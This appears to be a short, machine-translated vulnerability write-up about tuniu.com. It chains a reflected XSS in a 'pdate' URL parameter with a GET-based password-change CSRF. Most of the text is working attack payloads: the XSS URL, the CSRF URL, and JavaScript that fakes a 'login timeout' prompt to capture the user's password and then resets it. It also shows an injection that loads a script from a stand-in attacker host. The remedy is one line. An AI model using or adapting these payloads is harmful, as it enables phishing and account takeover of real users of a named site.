I remember using this in an interview, but the interviewer thought it was not feasible. I think it is feasible for users to be caught by X.
1. Some XSS: http://m.tuniu.com /? Action = route & id = 329846 & pdate = <ScRiPt> prompt (/xss/) </ScRiPt> & todo = index 2. Change the password CSRF: http://www.tuniu.com/main.php? Do = user_do_change_password & old = 123456 & new = password & pwd_s = 1 3. create external JS: var pass; pass = prompt ("Login timeout, please enter your password again", "password"); url = "http://www.tuniu.com/main.php? Do = user_do_change_password & new = password & pwd_s = 1 & old = "+ pass; window. location = url; 4. entice users to access http://m.tuniu.com /? Action = route & id = 329846 & pdate = <ScRiPt/src = // www.your-site.com/1.js> </ScRiPt> & todo = index if you enter the correct password, in JS, CSRF will reset its password.
1 indicates that the reset is successful, and 0 indicates that the reset fails. You can also combine XSSbypass. Use another window pop-up window to allow the user to enter the password ciphertext *. Can the location jump be changed to other silent messages?
Solution:Fix XSS and CSRF...